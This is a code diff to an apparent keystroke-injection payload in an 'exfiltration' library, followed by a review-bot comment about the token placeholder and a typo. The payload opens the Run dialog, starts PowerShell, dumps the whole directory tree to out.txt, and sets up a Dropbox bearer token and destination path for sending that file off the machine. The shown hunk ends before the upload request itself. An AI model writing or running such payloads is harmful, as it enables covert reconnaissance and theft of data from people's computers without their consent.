diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt index 88e06d1..0926faf 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt @@ -12,26 +12,19 @@ REM ########################################################### REM Requirements: REM - Internet connection +REM Set yout Dropbox access token +DEFINE #DROPBOX_ACCESS_TOKEN example GUI r DELAY 1000 -STRING PowerShell -ENTER +STRINGLN PowerShell DELAY 1000 -STRINGLN tree /f /a > out.txt - -REM It depends byt the content and by the path choosen -DELAY 5000 - -$filePath = ".\out.txt" - REM Setting about exfiltration -STRING $accessToken = -STRING DROPBOX_ACCESS_TOKEN -ENTER - -STRINGLN +STRINGLN_BLOCK + tree /f /a > out.txt + $filePath=".\out.txt"; + $accessToken="#DROPBOX_ACCESS_TOKEN" $authHeader = @{Authorization = "Bearer $accessToken"} $dropboxFilePath = "/out_exported.txt"
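Review bot: `DEFINE #DROPBOX_ACCESS_TOKEN example` puts the credential in a tracked file, so a filled-in copy that is committed or shared publishes a working token for the receiving Dropbox account; the comment above it should say that the value stays a placeholder in the repository. That comment also has a typo ("yout"); I would write `REM Set your Dropbox access token locally; keep the placeholder "example" in the repository`. The STRINGLN_BLOCK opened in this hunk is closed outside it, so the rest of the block is not covered by this note.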